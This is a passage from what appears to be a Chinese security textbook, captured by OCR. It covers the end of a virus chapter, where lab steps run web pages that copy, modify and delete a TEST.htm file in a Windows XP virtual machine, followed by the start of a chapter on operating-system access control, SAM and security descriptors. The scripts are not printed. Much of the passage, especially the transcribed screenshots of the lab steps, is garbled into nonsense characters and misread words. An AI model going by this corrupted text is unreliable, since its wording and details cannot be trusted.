@ 右 : 日- 唐 | 记 时 | 也 xHx| 国 - 
地 址 血 ) |<p 
文件 夹 < 
国 5 面 
国 轩 我 的 文档 
日 量 我 的 电脑 | 
轩 辈 35 软盘 以:) 其 
日 另 本 地 和 碰 盘 C5:) 1 


BD Decments sna Settin 
国 回 from Files 
国 加 nmos 
国电 ID- 3E 动 器 0.) 
< 本 地 磁盘 E;) 
> 本 直 磁 盘 他 :) 
国富 .host 上 的 Shared Fol 
国耻 控制 面板 
国 忆 共享 文档 
田 辐 echy 的 文档 
国 量 同上 邻居 
到 回 k 站 


打开 @) 

在 同一 窗口 中 打开 愉 ) 
打印 四 

编辑 E) 

打开 方式 人 0 » 
发 送 到 加 


鹏 切 @) 
复制 人 


创建 快捷 方式 ) 
如 除 D) 
重 命 名 好 


属性 @) 


Miware Tools installed successFully. 


11-19 ”打开 文件 “复制 . htm” 
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第 17 步 ,查看 文件 “复制 . htm” 的 运行 结果 ,如 图 11-20 和 图 11-21 所 示 。 


WinXP 一 YEware Yorkstation 
文件 @) 编辑 E) 查看 WW) 碟 拟 机 则 ”分 组 QD) 窗口 @) 帮助 0 
Ce 回 回回 图 


全 性 x FE 
le 加 复制 c: \IEST. HTE 文 件 到 桌面 - 了 icrosoft Internet Explorer 
晤 | 文件 ”篇 癌 @) 查看 ) 收 训 ) 工具 G) 天 助 吕 

Win 


@ 后 -日 - 国 国 的 Pes 闪 wex @| 全 -时 国 坊 


地 址 四 ) | 全 E;\ 复 制 . hts 司 图 # 到 链 革 >” 


名 本 地 辜 盘 


Mare Tools instolled successEully. 


图 11-20 文件 “复制 .htm” 的 运行 结果 


WinXP — YEware Workstation 


; 文件 EE) 六 邵 下 ) 查看 Y 虚拟 机 @) 分 姐 江 ) 窗口 如 帮助 0D 
i MPO : 侣 闻 仿 :回国 加 | 加 回 


侧 这 栏 x 加 
BD Powered On 


时 Wim 


日 入 evorites 


号 Wi 


[Vare Tools installed successfully. ET 


11-21 复制 到 桌面 上 的 文件 TEST. htm 
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第 18 步 ,打开 文件 “修改 . htm”, 如 图 11-22 所 示 。 


: 文件 旭 编辑 至) 查看 WD 成 所 机 分 组 CT) 窗口 各 帮助 0 
i WDD ;各 国 态 :| 因 加 加 | 回回 | 
便 这 栏 * 反正 2 天 已 wnxp 
ee 俩 本 地 克 盘 (FE:) 回回 四 
日 We 文件 四” 护 辑 中 查看 W) 收藏 和 ) 工具 中 帮助 中 [3 
Wi Fr 1 
@@ 银 -加 -让 只 峡 | 隐 xN | 国 
地 址 WD) [<p Ez:\ 司 回 时 
文件 夹 
国史 
四 图 我 列 文 档 
日 量 我 的 电 及 
国 晶 35 区 又 0 
国 他 本 地 磁 甸 2) 打开 人) 
国电 pm-a 38 动 器 0 ) 在 同一 窗口 中 打开 
田 < 本 地 三 盘 到:) 打印 加) 
田 ep 本 地 磁盘 全:】 编辑 下 ) 
国外 .host 上 的 Shared Fol 打开 方式 0 
日 也 近 t 
四 自 # 二 X 攻 发 关 到 中 ， 
回回 eshy 的 文档 到 切中 
国 晶 网 上 部 居 复制 人 
司 国 k 站 
他 娃 快捷 方式 G) 
抽 除 中) 
重 遇 名 虽 
属性 
[Viware Tools installed successEully. 而 


图 11-22 打开 文件 “修改 .htm” 
第 19 步 ,查看 文件 “修改 . htm” 的 运行 结果 ,如 图 11-23 所 示 。 


文件 EE) 编辑 也 ) 查看 WD 虚拟 机 如 分组) 窗口 四 帮助 0D 

i WD 久 表 有 加 国 回 | 回回 加 | 

全 过 栏 = 

时 De 当 修改 文件 内 容 c:\TEST- HTE - 了 icrosoft Internet Explorer 

Se 文件 四 ”编辑 EE) 查看 ) 收 庆 ) 工具 TT) 帮助 0 

MP 

FF 站 攻 全 。 也 
-日 - 国 国 的 时 六 Wx 加 仑 - 生 
地 址 中) | 外 2:\ 修 3htn 

Wieare Tools installed successfully Sy Yr 


11-23 文件 “修改 . htm” 的 运行 结果 
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第 20 步 , 用 记事 本 程序 打开 虚拟 机 C:\TEST. htm, 如 图 11-24 和 图 11-25 所 示 。 


WingP — YEware Workstation 
; 文件 @) 编辑 四 查看) 虚拟 机 人 分 姐 由 官 口 WD 帮助 吕 


i ma :各 二 全 :天 是 加 器 加 加 


创 演 栏 Dl Er 

ab a 一 本 地 巷 盘 (C:) 

日 名 Faverites 文件 如 ” 编 回 下 查看) 收藏 人 工具) 和 助 0 
时 time 


O 扫 -日 - 访 且 凌 蕊 Xx | 国 - 


地 址 四 ) 
四 一 
De™ we 
贺 隐 毫 此 缀 动 器 的 内 容 


动 添加 /到 险 程序 DY ops 

内 扫 索 文件 或 文件 天 | 打开 @) 
在 同一 窗口 中 打开 (A) 
打印 中 ) 

文件 和 文件 到 任务 。 

2 编辑 下) 

国 二 全 名 这 人 六 人 ne ore 

认 和 地 这 1 文件 最 记事 本 

加 和 人 文件 加 写字 板 kd 
nD 

@ Tan i noo 

3 以 由 邮件 开 式 发 - 

中 息 和 他 忆 失 放 式 旬 ) 

地 打 BD 个 文件 到 除 四 ) 

X hz 人 文件 下 名 员 


属性 凶 ) 


[ws Tools instolled suscessfuily 


图 11-24 用 记事 本 程序 打开 文件 TEST. htm 


WinkP - Vvare Workstation 国 回 四 
文件 如 ”编辑 于) 查看 WW 成 要 机 如 分 姐 G) 窗口 如 帮助 0) 
上 WIPO :他 贱 呈 :| 硬 让 加 | 器 回国 


侧 边 栏 
日 D Ponered On 


时 Wimr 


日 人 Favoritos 


加 Nin 


文件 四 编辑 外) 格式 @) 查看 帮助 0 
<html><body> 由 网 页 脚本 的 方式 修改 已 存在 文件 内 容 成 功 人 /body 


This is a test- 


一 本 地 磁盘 人 -) EST — : 10'39 


re Tools installed successEully. 


马 防 上 品 昌 二 自 . 


图 11-25 文件 TEST. htm 修改 后 的 内 容 
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第 21 步 ,打开 虚拟 机 C:\TEST. htm, 如 图 11-26 和 图 11-27 所 


WinXP 一 YEHware Workstation 

; 文件 四 编辑 四 查看 加 应 扳机 由 分 组 窗口 凶 ) 玫 助 0 

i WPle 简 珊 看 :| 因 辆 加 | 回回 | 
x 


OE- 旭 -六 月 如 了 xf# 天  [ 国 - 


[T DE x 
加 区 Porered On . | 
Be 本 地 匡 盘 《C:) 加 日 加 
ES a 文件 四 编 加 如 查看 外 收 阐 忆 工具 T) 帮助 0) 
WinXP 


示 。 


地 址 加) |<p Cc:\ 


Docunents and 
Settings 


| 隐 吉 Hg 埃 名 的 内 容 EE 
动 天 加 /到 际 程 序 > 

只 扫 索 文件 或 文件 天 | Ts 

文件 和 文件 夹 任务 【人 
国王 向 名 这 个 文件 
忠和 这 人 文件 


回复 和 这 个 文件 
全 


© Ms 
地 打 Bp 这 个 文件 
XX 3 这 人 文件 


Fromrm Files 


打开 @) 
在 同一 窗口 中 打开 (A) 
打印 区 ) 
编辑 到) 
打开 方式 0D 


发 送 到 名 


韶 切 侣 ) 
复制 C) 


凶 建 快捷 方式 E) 
删除 吧 ) 
重 命 名册 


属性 @B) 


文件 下 ) ”编辑 下 ) 
ks) 


查看 凡 虚 执 机 全 分 姐 吕 窗口 如 于 助 0 
总 逆 仿 :| 四 部 回 | 器 回 | 加 | 
x 


侧 边 栏 

最 Ps TEST- HTE - Microsoft Internet Explorer 

| 文件 下) 编辑 时) 查看 WD 收藏 和 工具 0 和 助 0 
iP 


地 址 押 ) | 酮 c:\TEST. JW 


由 网 页 脚本 的 方式 修改 已 存在 文件 内 容 成 功 This is a test. 


@a - 日 - 国 回 的 记 e 闪 wex 加 | 扩 - 甩 国电 


司 圆 # 到 Hi ” 


Mmare Tools installed successFully. 


图 11-27 网 页 TEST. htm 的 运行 结果 
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WingP - YEHware 可 prkstation 
文件 四 编辑 下 ) 查看 GD) 虚拟 机 他) 分 粗 江 ) 窗口 思 帮助 0 


里 电 || 伟 : 交 交 芭 :| 固态 加 | 器 回回 


人 2 栏 WinXP 
BD Poversd On 全 本 地 记 
故 m 本 地 三 盘 (E:) 
已 oon 文件 如 帝 往 思 查看 如 收藏 和 工具 (TD) 帮助 四 
WinXP 四 
~ 区 会 ] 也， - 
Oa- © -让 | 万 时 | 双 xx| 国 
地 址 四 [<p E:\ 站 加 条 
2 人 建 复制 
芒 痢 HINL Docunent NTL Docunent 
田 辐 我 9 文 簿 . 到 
日 量 我 的 电 及 
盏 旧 3.5 次 鱼 0) EN 
田 < 本 地 而 条 C5:) 打开 人 @) Es 
国电 bm- 怠 动 器 0:) 在 同一 窗口 中 打开 名) 
< 本 地 开盘 :) 打印 四 
田 < 本 地 磁 务 人 F:) 编辑 E) 
下 芝 : host” 上 的 Shared Fol 打开 方式 0 » 
田 区 近 制 克 板 
四 共 地 X 冰 发 送 到 中 » 
田 加 eshy 的 文档 前 切 忆 ) 
国 晶 同上 部 居 复制 C) 
司 回收 站 
创 寻 快捷 方式 G) 
击 除 中) 
重合 名 
< » 展 性 人) 


Mere Tools installed ss 


图 11-28 打开 文件 “删除 . htm” 
第 23 步 , 查 看 文件 “删除 . htm” 的 运行 结果 ,如 图 11-29 和 图 11-30 所 示 。 


文件 @) 编辑 下 ) 查看 WD 虚拟 机 如 ”分 组 [) 窗口 和 ) 帮助 00) 
WP ;人 多 厂 太古 辆 加 | 器 回 图 
mae “ 莉 
a a ET ITT IT - Microsoft Internet Explorer 
全 全 文件 中” 铀 名 全 可 看 W) 收藏 工具 加 帮助 0 
in 
Es 人 x3. 忆 
-日 -四 国航 时 好 包罗- 对 国 温 
地 址 站) | 栓 ] 了，\ 玛 除 htn 司 贺 六 到 馆 接 > 
[as Tools instIed successEully. ET oT TIE 


图 11-29 文件 “删除 .htm” 的 运行 结果 
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可 inXP YEvare Workstation 
文件 @ 编辑 他 ) 查看 中 庶 撞 机 如 ”分 组 各 窗口 0) 种 助 好 
im mPa :各 效 六 :回国 加 | 品 回 加 


Mare Tools installed successFully. 


图 11-30 桌面 上 的 文件 TEST. htm 已 经 被 删除 


本 章 小 结 


计算 机 病毒 是 一 个 程序 ,一 段 可 执行 代码 。 就 像 生物 病毒 一 样 ,计算 机 病毒 具有 独特 的 
复制 能 力 。 计 算 机 病毒 可 以 很 快 地 蔓延 ,又 难以 根除 。 计 算 机 病毒 是 一 段 非常 短 的 .通常 只 
有 几 千 个 字 节 ,会 不 断 自 我 复制 .隐藏 和 感染 其 他 程序 或 计算 机 的 程序 代码 。 

本 章 从 概念 ,分 类 特征、 破坏 行为 和 作用 机 理 等 方面 详细 地 介绍 了 计算 机 病毒 ,然后 以 
蠕虫 病毒 为 例 进一步 图 述 了 计算 机 病毒 理论 。 并 从 特征 ,原理 和 实例 分 析 等 角度 介绍 了 蜂 
虫 病毒 。 

还 从 检测 、 清 除 及 防范 的 角度 介绍 了 计算 机 病毒 的 防治 ; 此 外 还 对 流行 杀毒 软件 及 运 
作 机 制 进行 了 简要 介绍 ; 最 后 介绍 了 网 络 病毒 的 防治 。 


另外 ,本 章 还 介绍 了 手机 病毒 的 概念 .手机 病毒 的 危害 及 其 防范 方法 。 


1. 感染 型 病毒 的 原理 是 什么 ? 
2. 计算 机 病毒 的 传播 机 制 是 什么 ? 
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.“ 蠕 虫 "病毒 的 原理 是 什么 2“ 蠕虫 ?病毒 有 哪些 特征 ? 
. 什么 是 计算 机 病毒 ? 计算 机 病毒 有 哪些 特征 ? 

. 计算 机 系统 感染 病毒 后 有 哪些 现象 ? 

. 如 何 正确 地 清除 计算 机 系统 中 存在 的 病毒 ? 

. 普通 的 计算 机 用 户 如 何 防 范 计算 机 病毒 ? 

目前 ,在 病毒 防治 领域 中 有 哪些 流行 的 杀毒 软件 ? 


第 12 章 操作 系统 安全 技术 


操作 系统 是 帮助 用 户 管理 计算 机 各 种 资源 的 程序 集合 ,是 计算 机 最 基本 的 软件 系统 。 
操作 系统 是 信息 安全 技术 体系 中 重要 的 组 成 部 分 ,操作 系统 的 安全 与 否 对 于 各 种 信息 系统 
的 安全 至 关 重 要 。 


12.1 操作 系统 安全 基础 


目前 服务 器 常用 的 操作 系统 主要 有 UNIX、Linux、Windows 3 类 。 这 些 操作 系统 都 是 
符合 C2 级 安全 级 别 的 操作 系统 ,这 是 用 纯 软 件 手 段 能 够 达到 的 最 高 安全 级 别 。 但 是 它们 
也 都 存在 不 少 漏洞 ,如 果 对 这 些 漏洞 不 采取 相应 的 措施 ,就 会 使 操作 系统 完全 暴露 给 入 
侵 者 。 

1. UNIX 系统 

UNIX 操作 系统 是 由 美国 贝尔 实验 室 开 发 的 一 种 多 用 户 、 多 任务 的 通用 操作 系统 。 它 
从 一 个 实验 室 的 产品 发 展 成 为 当前 使 用 普遍 ,影响 深远 的 主流 操作 系统 。 

UNIX 诞生 于 20 世纪 60 年 代 末 期 ,贝尔 实验 室 的 研究 人 员 于 1969 年 开始 在 GE645 
计算 机 上 实现 一 种 分 时 操作 系统 的 雏形 ,后 来 该 系统 被 移植 到 了 DEC 的 PDP-7 小 型 机 上 。 
1970 年 给 系统 正式 命名 为 UNIX 操作 系统 。 到 1973 年 ,UNIX 系统 的 绝 大 部 分 源 代 码 都 
用 C 语言 重新 编写 过 ,大 大 提高 了 UNIX 系统 的 可 移植 性 ,也 为 提高 系统 软件 的 开发 效率 
创造 了 条 件 。 

UNIX 操作 系统 经 过 20 多 年 的 发 展 后 ,已 经 成 为 一 种 成 熟 的 主流 操作 系统 ,并 在 发 展 
过 程 中 逐步 形成 了 一 些 新 的 特色 ,其 中 主要 特色 包括 以 下 5 个 方面 。 

(1) 可 靠 性 高 。 在 主流 操作 系统 中 UNIX 出 现 极 早 , 使 用 最 广泛 。 在 各 种 运行 环境 下 
积累 了 大 量 的 经 验 教训 ,并 进行 了 不 断 的 完善 ,改进 ,使 得 UNIX 操作 系统 最 为 成 熟 稳定 。 

(2) 极 强 的 伸缩 性 。 能 够 支持 从 微型 机 到 超级 计算 机 的 资源 管理 需求 ,普通 的 商业 系 
统 也 能 够 支持 几 十 个 CPU 服务 器 的 运行 。 

(3) 网 络 功能 强 。TCP/IP 协议 最 早 就 是 为 UNIX 系统 开发 的 ,网 络 支持 是 UNIX 的 


核心 功能 之 一 。 
(4) 强大 的 应 用 软件 支持 功能 。 在 漫长 的 使 用 过 程 中 积累 了 极其 丰富 的 应 用 软件 ,可 
以 满足 用 户 各 种 需求 。 


(5) 开放 性 好 。 有 着 开放 的 国际 标准 ,各 个 厂商 开发 的 UNIX 需要 依照 标准 设计 实现 
自己 的 UNIX 家 族 产品 ,否则 不 能 称 为 UNIX。 


2. Linux 系统 
Linux 是 一 套 可 以 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 ,被 广泛 使 用 于 各 种 网 络 
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服务 器 。 这 个 系统 是 由 全 世界 各 地 的 成 千 上 万 的 程序 员 设 计 和 实现 的 。 其 目的 是 建立 不 受 
任何 商品 化 软件 的 版 权 制约 的 、 全 世界 都 能 自由 使 用 的 UNIX 兼容 产品 。 

Linux 最 早 开始 于 一 位 名 为 Linus Torvalds 的 计算 机 业余 爱好 者 ,当时 他 是 芬兰 赫 尔 
辛 基 大 学 的 学 生 。 目 的 是 想 设 计 一 个 代 苦 Minix( 是 由 一 位 名 为 Andrew Tannebaum 的 计 
算 机 教授 编写 的 一 个 操作 系统 示 教 程序 ) 的 操作 系统 。 这 个 操作 系统 可 用 于 386、486 或 奔 
腾 处 理 器 的 个 人 计算 机 上 ,并 且 具 有 UNIX 操作 系统 的 全 部 功能 。Linux 典型 的 优点 有 以 
了 7 

(1) 完全 免费 。 

(2) 完全 兼容 POSIX 1. 0 标准。 

(3) 多 用 户 、 多 任务 。 

(4) 良好 的 界面 。 

(5) 丰富 的 网 络 功能 。 

(6) 可 靠 的 安全 、 稳 定性 能 。 

(7) 支持 多 种 平台 。 

3. Windows 系统 

Windows NT(New Technology) 是 微软 公司 1993 年 推出 的 面向 工作 站 、 网 络 服务 器 和 
大 型 计算 机 的 网 络 操作 系统 ,是 微软 公司 第 一 个 真正 意义 上 的 网 络 操作 系统 。 其 发 展 经 革 
NT3.0 .NT40、 NT5.0(Windows 2000) .NT5. 2(Windows Server 2003)、NT6. 0(Windows 
Server 2008) 和 NT6. 3(Windows Server 2012 R2) 等 众多 版 本 ,并 逐步 占据 了 广大 的 中 小 网 
络 操作 系统 的 市 场 。Windows NT 的 网 络 功 能 更 加 强大 并 且 安 全 。Windows NT 系列 操作 
系统 具有 以 下 3 方面 的 优点 。 

(1) 支持 多 种 网 络 协议 。 由 于 在 网 络 中 可 能 存在 多 种 客户 机 ,如 Windows 7/8/10、 
Apple Macintosh、UNIX、OS/2 等 ,而 这 些 客户 机 可 能 使 用 了 不 同 的 网 络 协议 ,如 TCP/IP 
协议 .IPX/SPX 等 。Windows NT 系列 操作 几乎 支持 所 有 常见 的 网 络 协议 。 

(2) 内 置 Internet 功能 。 随 着 Internet 的 流行 和 TCP/IP 协议 组 的 标准 化 , Windows 
NT 内置 了 IISCInternet Information Server) ,可 以 使 网 络 管理 员 轻 松 地 配置 WWW 和 FTP 
等 服务 。 

(3) 支持 NTFS 文件 系统 。NT 中 内 置 同时 支持 FAT 和 NTFS 的 磁盘 分 区 格式 。 使 
用 NTFS 的 优点 主要 是 可 以 提高 文件 管理 的 安全 性 ,用 户 可 以 对 NTFS 系统 中 的 任何 文 
件 、 目 录 设置 权限 ,这 样 当 多 用 户 同时 访问 系统 时 ,可 以 增加 文件 的 安全 性 。 


12.2 操作 系统 安全 的 基本 概念 


下 面 介绍 一 些 与 操作 系统 安全 相关 的 基本 概念 。 

1. 主体 与 客体 

操作 系统 中 的 每 一 个 实体 可 以 归 为 主体 和 客体 。 主 体 是 指 那 些 主动 的 实体 , 它 会 访问 
系统 中 各 种 资源 和 服务 ,类 似 用 户 、 用 户 组 、 进 程 等 都 是 主体 。 客 体 则 是 指 那 些 被 动 的 实体 ， 
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接受 主体 的 各 种 访问 。 客 体 可 以 是 文件 这 样 的 存储 介质 上 的 数据 信息 ,也 可 以 是 操作 系统 
中 能 够 提供 某 种 服务 或 信息 的 进程 。 

在 操作 系统 中 ,一 个 实体 必然 是 一 个 主体 或 是 一 个 客体 ,如 果 它 既 不 是 主体 也 不 是 客体 
就 意味 着 它 不 会 与 任何 实体 相 作 用 ,在 与 操作 系统 相关 的 讨论 中 就 没有 意义 。 

操作 系统 中 某 些 实体 既是 主体 又 是 客体 ,操作 系统 中 的 进程 就 有 着 这 样 的 双重 身份 。 
一 个 进程 必定 为 某 一 用 户 服务 ,直接 或 间接 地 处 理 该 用 户 的 各 种 要 求 ,该 进程 成 为 该 用 户 的 
客体 ,或 者 是 某 个 直接 为 用 户 服务 进程 的 客体 。 进 程 在 为 用 户 服务 过 程 中 都 需要 访问 其 他 
客体 ,如 此 它 又 是 主体 。 

系统 中 最 基本 的 主体 是 用 户 , 系 统 中 的 所 有 事件 要 求 , 几 乎 全 是 由 用 户 激发 的 。 系 统 中 
每 个 用 户 必 须 是 能 够 唯一 标识 的 ,并 能 够 被 鉴别 为 真实 的 。 进 程 是 系统 中 最 活跃 的 实体 ,用 
户 的 所 有 事件 要 求 都 要 通过 进程 的 运行 来 处 理 。 

2. 访问 控制 矩阵 

明确 了 主体 和 客体 ,要 在 操作 系统 层面 讨论 信息 安全 ,就 是 要 保证 操作 系统 中 任何 主体 
对 客体 的 访问 都 是 合法 的 。 访 问 控制 矩阵 就 是 一 个 记录 主体 对 客体 访问 合法 性 的 数据 结 
构 。 访 问 控制 矩阵 可 以 视 为 一 个 二 维 表 , 一 维 是 全 部 主体 ,一 维 是 全 部 客体 , 表 中 的 每 一 个 
单元 格 则 标记 了 特定 主体 可 以 对 特定 客体 的 访问 权限 。 

当然 ,访问 控制 矩阵 只 是 一 个 概念 性 的 数据 结构 ,在 操作 系统 中 并 没有 这 样 一 个 表格 的 
实体 。 访 问 控制 矩阵 的 内 容 在 不 同 操作 系统 中 以 不 同方 式 被 组 织 起 来 。 

例如 ,在 UNIX 或 Linux 操作 系统 中 ,用 户 可 以 看 到 ,每 个 作为 客体 的 文件 都 会 有 自己 
的 权限 字符 串 。 在 UNIX 或 Linux 系统 中 ,文件 都 属于 某 个 特定 的 用 户 , 用 户 又 属于 某 一 
个 用 户 组 ,对 文件 的 访问 权限 分 为 读 、 写 、 执 行 。 如 图 12-1 所 示 ,两 个 文件 都 属于 root 用 户 ， 
root 用 户 属于 root 用 户 组 。 图 12-1 中 ,每 行 最 前 面 的 ,具有 10 个 字符 的 字符 串 就 是 描述 文 
件 权限 的 字符 串 。 字 符 串 的 第 一 个 字符 表示 文件 对 象 的 类 型 ,d 表示 目录 ,- 表 示 普 通 文 件 。 
后 面 9 个 字符 每 3 个 一 组 说 明了 文件 的 访问 权限 。 前 3 个 字符 表示 文件 所 有 者 对 文件 是 否 
有 读 、 写 .执行 权限 ,中间 3 个 字符 表示 与 所 有 者 同 组 用 户 对 文件 的 访问 权限 ,后 面 3 个 字符 
表示 其 他 用 户 对 文件 的 访问 权限 。 


drwxr-xr-x 2 root root 4096 5 月 23 2014 if-up.d/ 
-IWwr—r— 1root root 347 6 月 12 2017 interfaces 


12-1 Linux 列 出 文件 命令 显示 的 内 容 


另外 ,要 注意 的 是 ,访问 控制 矩阵 本 身 其 实 也 可 以 视 为 一 个 独特 的 客体 。 

3. 自主 访问 控制 和 强制 访问 控制 

主体 对 客体 的 访问 权限 记录 在 访问 控制 矩阵 中 。 在 很 多 操作 系统 中 ,访问 控制 矩阵 的 
数据 来 源 有 自主 访问 控制 和 强制 访问 控制 两 部 分 。 

自主 访问 控制 就 是 由 资源 的 所 有 者 自己 来 决定 其 他 主体 可 以 用 什么 样 的 方式 来 访问 自 
己 的 特定 资源 。 

强制 访问 控制 则 是 由 系统 来 强制 规定 主体 、 客 体 之 间 的 访问 规则 。 例 如 ,在 一 些 操 作 系 
统 中 ,不 同 的 主体 设置 有 不 同 的 安全 级 别 。 系 统 强制 规定 ,低级 别 的 主体 必须 不 能 读 取 属于 
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高 级 别 主 体 的 客体 ,而 高 级 别 的 主体 可 以 读 取 低 级 别 的 客体 。 
在 访问 控制 矩阵 中 ,强制 访问 控制 的 约束 是 不 可 修改 的 ,自主 访问 控制 只 能 在 强制 访问 
控制 允许 的 范围 内 进行 。 前 面 段落 的 例子 中 ,低级 别 的 主体 可 以 自主 决定 ,自己 的 某 个 文件 
可 否 让 某 类 高 级 别 主体 读 取 ; 而 高 级 别 的 客体 对 低级 别 主体 永远 是 无 法 读 取 的 ,其 所 有 者 

4. 基于 角色 的 访问 控制 

访问 控制 矩阵 中 的 数据 量 是 比较 大 的 , 当 系统 中 主体 、 客 体 过 多 时 ,恰当 的 管理 主体 对 
客体 的 访问 权限 ,对 于 管理 而 言 是 一 件 非 常 麻烦 和 困难 的 事情 。 

基于 角色 的 访问 控制 就 是 一 种 方便 访问 权限 管理 的 解决 方法 。 

在 基于 角色 的 访问 控制 模式 中 ,用 户 被 赋予 一 定 的 角色 ; 对 客体 的 访问 权限 则 被 赋予 
不 同 的 角色 。 一 个 主体 可 以 同时 被 赋予 多 个 角色 。 

查看 一 个 主体 对 特定 客体 的 访问 权限 ,要 看 主体 拥有 哪些 角色 ,这 些 角 色 对 该 客体 有 什 
么 访问 权限 。 通 过 改变 角色 的 访问 权限 或 改变 主体 所 担任 的 角色 ,可 以 调整 主体 对 客体 的 
访问 权限 。 通 过 恰当 的 设置 角色 ,利用 角色 的 不 同 搭配 授权 来 减少 访问 权限 管理 的 工作 量 。 

在 Windows 或 UNIX、Linux 中 ,用 户 属于 不 同 的 组 ,可 以 视 为 一 种 基于 角色 或 近似 基 
于 角色 的 访问 控制 管理 方式 。 

除了 基于 角色 的 访问 控制 ,还 有 基于 DTE 模型 的 访问 控制 。 在 这 样 的 模型 中 主体 被 
分 为 不 同 的 域 ,客体 被 分 为 不 同 的 类 型 ,不 同 的 域 对 不 同类 型 的 客体 有 不 同 的 访问 权限 。 如 
此 以 迎合 更 大 规模 系统 中 访问 权限 的 管理 方便 性 需求 。 

5. 用 户 的 标识 与 鉴别 

用 户 是 所 有 主体 访问 行为 的 源头 。 为 了 明确 各 种 访问 行为 的 主体 所 具有 的 权限 ,在 操 
作 系 统 中 都 有 明确 访问 主体 的 请 求 最 终 来 源 于 哪个 用 户 的 机 制 。 

而 操作 系统 必须 对 用 户 提供 充分 的 标识 与 鉴别 。 凡 需 进 入 操作 系统 的 用 户 , 应 先进 行 
标识 , 即 建立 账号 。 特 定 账号 的 用 户 如果 要 进入 系统 必须 通过 操作 系统 的 鉴别 机 制 , 最 简单 
的 就 是 口令 鉴别 。 

用 户 开 启 的 进程 需要 与 所 有 者 相关 联 , 进 程 行为 可 追溯 到 进程 的 所 有 者 。 当 进程 发 起 
访问 行为 时 ,操作 系统 的 服务 进程 可 追溯 到 服务 要 求 的 用 户 。 

6. 访问 控制 器 

前 面 讨论 了 记录 主体 对 客体 访问 依据 的 访问 控制 矩阵 ,介绍 了 其 内 容 、 实 际 形式 、 数 据 
包含 内 容 等 知识 。 要 让 操作 系统 中 主体 对 客体 的 访 


We 访问 控制 矩阵 

问 切实 依据 访问 控制 矩阵 的 内 容 来 进行 ,这 就 需要 访 

问 控 制 器 ,也 称 为 访问 监控 器 。 | 
访问 控制 器 的 基本 工作 原理 如 图 12-2 所 示 。 [主体 | -区间 控 制 星 上 一 客体 
在 操作 系统 中 ,任何 主体 对 客体 的 访问 都 需要 经 | 

过 访问 控制 器 的 管理 。 访 问 控制 器 首先 要 对 主体 身 和 2 


份 进行 鉴别 。 然 后 ,访问 控制 器 将 根据 访问 控制 矩阵 
中 设 定 的 规则 对 访问 某 资源 的 行为 进行 控制 ,只 有 规 
则 允许 时 才 同 意 访问 ,违反 预定 规则 的 访问 行为 将 被 拒绝 。 无 论 访问 是 否 成 功 ,访问 控制 器 


12-2 访问 控制 器 的 基本 工作 原理 
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都 要 记录 访问 请 求 的 情况 : 哪 种 主体 在 什么 时 间 对 哪 种 客体 进行 什么 形式 的 访问 ,成 功 还 
是 被 拒绝 。 访 问 控制 器 是 操作 系统 非常 核心 的 安全 机 制 ,其 具体 实现 是 操作 系统 中 的 核心 
功能 之 一 。 

7. 安全 内 核 

安全 内 核 是 实现 访问 监控 器 概念 的 一 种 技术 ,在 操作 系统 中 有 类 似 访 问 监控 器 这 样 的 
关键 部 分 ,它们 本 身 的 安全 对 于 操作 系统 的 安全 至 关 重 要 。 所 


以 在 设计 、 实 现 操 作 系 统 的 过 程 中 ,类 似 的 内 核 功能 必须 予以 足 应 用 程序 
够 的 保护 ,保证 其 完整 性 .可 用 性 。 这 便 是 操作 系统 的 安全 内 
核 。 很 多 安全 要 求 比较 高 的 系统 中 ,安全 内 核 都 要 有 硬件 支持 ， 操作 系统 
由 硬件 和 介 于 硬件 与 操作 系统 其 他 部 分 之 间 的 一 层 软 件 组 成 。 安全 内 核 (软件 ) 
安全 内 核 在 系统 中 的 位 置 如 图 12-3 所 示 。 
安全 内 核 (硬件 ) 

8. 最 小 特权 管理 

在 一 般 常见 的 操作 系统 中 ,都 有 超级 用 户 ,如 UNIX 和 图 12-3 安全 内 核 在 系统 
Linux 的 root 用 户 ,Windows 系统 的 administrator 用 户 。 超 级 中 的 位 置 


用 户 具有 访问 操作 系统 任何 资源 的 特权 ,可 以 对 操作 系统 做 任 
何 的 配置 和 管理 。 这 种 特权 管理 方式 便于 系统 维护 和 配置 ,但 不 利于 系统 的 安全 性 。 如 果 
超级 用 户 的 口令 泄露 或 身份 被 恶意 冒充 ,或 者 用 户 本 身 进行 了 误 操作 ,将 会 对 系统 造成 极 大 
的 损失 。 

所 以 ,在 一 些 对 安全 要 求 比较 高 的 系统 中 经 常 采 用 最 小 特权 管理 的 机 制 。 系 统 中 不 设 
置 超级 用 户 ,必要 的 管理 工作 分 配给 几 个 管理 员 账 号 进行 。 超 级 用 户 的 权限 被 进行 细 粒 度 
的 划分 ,分 配给 几 个 管理 员 账 号 。 系 统 的 配置 需要 几 个 不 同 的 用 户 协作 处 理 才 能 进行 ,每 个 
管理 员 只 具有 完成 其 任务 所 需 的 特权 。 从 而 减少 由 于 超级 用 户口 令 丢 失 ,错误 软件 、 恶 意 软 
件 \ 误 操作 所 引起 的 损失 。 


12.3 Windows 系统 的 访问 控制 原理 


Windows 系统 是 一 般 用 户 最 常见 的 操作 系统 。 下 面 将 介绍 Windows 系统 与 安全 访问 
有 关 的 内 容 。 


12.3.1 Windows 系统 的 基本 概念 与 安全 机 制 


1. 用 户 与 安全 标识 

Windows 操作 系统 也 要 求 进入 系统 的 使 用 者 建立 账号 。 操 作 系 统 对 每 个 用 户 建立 唯 
一 的 标识 号 码 , 称 为 安全 标识 (Security Identifier, SID)。 每 一 个 用 户 在 创建 时 被 授予 一 个 
唯一 的 SID; 安全 标识 和 用 户 账 号 唯一 对 应 ,在 账号 创建 时 创建 ,账号 删除 时 删除 ,而 且 永 
不 再 用 。 安 全 标识 与 对 应 的 用 户 和 组 的 账号 信息 一 起 存储 在 系统 的 安全 账号 管理 数据 
库 中 。 
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2. 安全 账号 管理 器 

Windows 系统 的 用 户 信息 存储 在 系统 内 ,如 果 随 便 哪 个 用 户 都 可 以 任意 访问 甚至 修改 
这 部 分 数据 对 系统 的 安全 威胁 是 显而易见 的 。Windows 系统 用 专门 的 安全 账号 管理 器 
(Security Account Manager,SAM) 保 障 用 户 账 号 数据 的 安全 。 用 户 账号 信息 存放 在 由 安 
全 账号 管理 器 管理 的 安全 性 管理 数据 库 (SAM 数据 库 ,也 称 为 目录 数据 库 ) 。 

3. 安全 描述 符 

安全 描述 符 (security descript) 是 Windows 系统 中 对 资源 的 安全 特性 描述 ,包括 4 个 部 
分 的 安全 特性 : 所 有 者 标识 ,组 标识 、 自 主 访问 控制 表 、 系 统 访问 控制 表 。 

